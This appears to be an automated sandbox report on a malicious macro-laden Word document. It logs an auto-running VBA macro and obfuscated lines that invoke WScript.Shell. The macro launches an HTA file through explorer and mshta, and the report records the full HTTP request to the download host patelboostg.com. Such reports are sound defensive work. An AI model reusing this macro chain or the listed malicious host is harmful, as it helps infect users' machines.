Source: enjoin,12.27.2021.doc |
ReversingLabs: Detection: 44% |
Source: enjoin,12.27.2021.doc |
Joe Sandbox ML: detected |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process created: C:\Windows\explorer.exe |
Source: global traffic |
TCP traffic: 192.168.2.22:49165 -> 45.67.229.54:80 |
Source: global traffic |
DNS query: name: patelboostg.com |
Source: global traffic |
TCP traffic: 192.168.2.22:49165 -> 45.67.229.54:80 |
Source: global traffic |
HTTP traffic detected: GET /frhe/L8dclCye7SQ5WTFva78FDxOjGBOF9iJro4DRgV/5inYIaSBt0KLfMB9kXwZBv6ZpTsny6/qAhIQjrAaLKJeTLQnbCarASpMADNe9u19Kylnkoreo7/SjqMh4eEx0Hx9b4h5e2fMcQgeIbFT/kKeSzfUaenwSFB/ISkVIHedx0p/49280/SruwcI68Yb5pVaVqfvyOHztDsbEuhGxtlV6bpgPIFvGFQ277/7FkN9pAcaWDfFlGNBeuaqGed8iDibaWexT/GyAAzLRbFAU1XErrU1F/vaci3?page=V8BBaQuem65&page=XYvyd0Dcrg6fJYLGHRVWp7s1tv&page=dvZwXcjcYCjBX8tPaALshiDAx85PEq&sid=10tOgWzOZj9xyAidNJAz3d9Ob0 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: patelboostg.comConnection: Keep-Alive |
Source: mshta.exe, 00000004.00000002.422851732.00000000061D0000.00000004.00000001.sdmp |
String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin) |
Source: mshta.exe, 00000004.00000002.422058921.00000000036D0000.00000002.00020000.sdmp |
String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail) |
Source: mshta.exe, 00000004.00000002.422851732.00000000061D0000.00000004.00000001.sdmp |
String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin) |
Source: mshta.exe, 00000004.00000002.422058921.00000000036D0000.00000002.00020000.sdmp |
String found in binary or memory: http://investor.msn.com |
Source: mshta.exe, 00000004.00000002.422058921.00000000036D0000.00000002.00020000.sdmp |
String found in binary or memory: http://investor.msn.com/ |
Source: mshta.exe, 00000004.00000002.422251797.00000000038B7000.00000002.00020000.sdmp |
String found in binary or memory: http://localizability/practices/XML.asp |
Source: mshta.exe, 00000004.00000002.422251797.00000000038B7000.00000002.00020000.sdmp |
String found in binary or memory: http://localizability/practices/XMLConfiguration.asp |
Source: mshta.exe, 00000004.00000003.421274202.000000000235B000.00000004.00000001.sdmp, mshta.exe, 00000004.00000003.420884675.0000000000382000.00000004.00000001.sdmp, mshta.exe, 00000004.00000002.422873506.00000000061F8000.00000004.00000001.sdmp, mshta.exe, 00000004.00000002.421768201.0000000000388000.00000004.00000001.sdmp |
String found in binary or memory: http://patelboostg.com/frhe/L8dclCye7SQ5WTFva78FDxOjGBOF9iJro4DRgV/5inYIaSBt0KLfMB9kXwZBv6ZpTsny6/qA |
Source: explorer.exe, 00000002.00000002.406995394.0000000001C50000.00000002.00020000.sdmp, explorer.exe, 00000003.00000002.407293237.0000000001D40000.00000002.00020000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. |
Source: mshta.exe, 00000004.00000002.422251797.00000000038B7000.00000002.00020000.sdmp |
String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check |
Source: mshta.exe, 00000004.00000002.422251797.00000000038B7000.00000002.00020000.sdmp |
String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true |
Source: explorer.exe, 00000002.00000002.406995394.0000000001C50000.00000002.00020000.sdmp, explorer.exe, 00000003.00000002.407293237.0000000001D40000.00000002.00020000.sdmp |
String found in binary or memory: http://www.%s.comPA |
Source: mshta.exe, 00000004.00000002.422058921.00000000036D0000.00000002.00020000.sdmp |
String found in binary or memory: http://www.hotmail.com/oe |
Source: mshta.exe, 00000004.00000002.422251797.00000000038B7000.00000002.00020000.sdmp |
String found in binary or memory: http://www.icra.org/vocabulary/. |
Source: mshta.exe, 00000004.00000002.422058921.00000000036D0000.00000002.00020000.sdmp |
String found in binary or memory: http://www.msnbc.com/news/ticker.txt |
Source: mshta.exe, 00000004.00000002.422058921.00000000036D0000.00000002.00020000.sdmp |
String found in binary or memory: http://www.windows.com/pctv. |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B70C9704-7AD7-458C-BF06-A25E66915659}.tmp |
Jump to behavior |
Source: unknown |
DNS traffic detected: queries for: patelboostg.com |
Source: global traffic |
HTTP traffic detected: GET /frhe/L8dclCye7SQ5WTFva78FDxOjGBOF9iJro4DRgV/5inYIaSBt0KLfMB9kXwZBv6ZpTsny6/qAhIQjrAaLKJeTLQnbCarASpMADNe9u19Kylnkoreo7/SjqMh4eEx0Hx9b4h5e2fMcQgeIbFT/kKeSzfUaenwSFB/ISkVIHedx0p/49280/SruwcI68Yb5pVaVqfvyOHztDsbEuhGxtlV6bpgPIFvGFQ277/7FkN9pAcaWDfFlGNBeuaqGed8iDibaWexT/GyAAzLRbFAU1XErrU1F/vaci3?page=V8BBaQuem65&page=XYvyd0Dcrg6fJYLGHRVWp7s1tv&page=dvZwXcjcYCjBX8tPaALshiDAx85PEq&sid=10tOgWzOZj9xyAidNJAz3d9Ob0 HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: patelboostg.comConnection: Keep-Alive |
Source: enjoin,12.27.2021.doc |
OLE, VBA macro line: CreateObject("wsc" + cont1("company") + "ell").exec cont1("category") + " " + mouseVideo |
|
Source: VBA code instrumentation |
OLE, VBA macro: Module ThisDocument, Function srn1, API IWshShell3.exec("explorer i7Gigabyte.hta") |
Name: srn1 |
Source: enjoin,12.27.2021.doc |
OLE, VBA macro line: Sub Document_Open() |
|
Source: VBA code instrumentation |
OLE, VBA macro: Module ThisDocument, Function Document_Open |
Name: Document_Open |
Source: enjoin,12.27.2021.doc |
OLE indicator, VBA macros: true |
Source: enjoin,12.27.2021.doc |
OLE, VBA macro line: cont1 = activedocument.builtindocumentproperties(i7computermonitor).value |
Source: C:\Windows\SysWOW64\mshta.exe |
Memory allocated: 76F90000 page execute and read and write |
Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe |
Memory allocated: 76E90000 page execute and read and write |
Jump to behavior |
Source: enjoin,12.27.2021.doc |
ReversingLabs: Detection: 44% |
Source: unknown |
Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding |
|
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process created: C:\Windows\explorer.exe explorer i7Gigabyte.hta |
|
Source: unknown |
Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding |
|
Source: C:\Windows\explorer.exe |
Process created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Documents\i7Gigabyte.hta" |
|
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process created: C:\Windows\explorer.exe explorer i7Gigabyte.hta |
Jump to behavior |
Source: C:\Windows\explorer.exe |
Process created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Documents\i7Gigabyte.hta" |
Jump to behavior |
Source: enjoin,12.27.2021.doc |
OLE indicator, Word Document stream: true |
Source: mshta.exe, 00000004.00000002.422058921.00000000036D0000.00000002.00020000.sdmp |
Binary or memory string: .VBPud<_ |
Source: classification engine |
Classification label: mal64.expl.winDOC@6/13@1/1 |
Source: enjoin,12.27.2021.doc |
OLE document summary: title field not present or empty |
Source: enjoin,12.27.2021.doc |
OLE document summary: author field not present or empty |
Source: enjoin,12.27.2021.doc |
OLE document summary: edited time not present or 0 |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process created: C:\Windows\explorer.exe |
|
Source: unknown |
Process created: C:\Windows\explorer.exe |
|
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process created: C:\Windows\explorer.exe |
Jump to behavior |
Source: Window Recorder |
Window detected: More than 3 window changes detected |
Source: enjoin,12.27.2021.doc |
Initial sample: OLE summary comments = ta |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll |
Jump to behavior |
Source: enjoin,12.27.2021.doc |
Initial sample: OLE document summary bytes = 26624 |
Source: enjoin,12.27.2021.doc |
Initial sample: OLE document summary category = explorer |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\explorer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\explorer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\explorer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\explorer.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: enjoin,12.27.2021.doc |
Stream path 'Data' entropy: 7.93699752134 (max. 8.0) |
Source: C:\Windows\explorer.exe TID: 2604 |
Thread sleep time: -60000s >= -30000s |
Jump to behavior |
Source: C:\Windows\explorer.exe TID: 2604 |
Thread sleep time: -60000s >= -30000s |
Jump to behavior |
Source: C:\Windows\explorer.exe TID: 2780 |
Thread sleep time: -60000s >= -30000s |
Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe TID: 2852 |
Thread sleep time: -360000s >= -30000s |
Jump to behavior |
Source: explorer.exe, 00000003.00000003.406664459.000000000041E000.00000004.00000001.sdmp |
Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}] |
Source: C:\Windows\SysWOW64\mshta.exe |
Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation |
Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe |
Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation |
Jump to behavior |
Source: C:\Windows\explorer.exe |
Directory queried: C:\Users\user\Documents |
Jump to behavior |
Source: C:\Windows\explorer.exe |
Directory queried: C:\Users\user\Documents |
Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe |
Directory queried: C:\Users\user\Documents |
Jump to behavior |
Source: C:\Windows\SysWOW64\mshta.exe |
Directory queried: C:\Users\user\Documents |
Jump to behavior |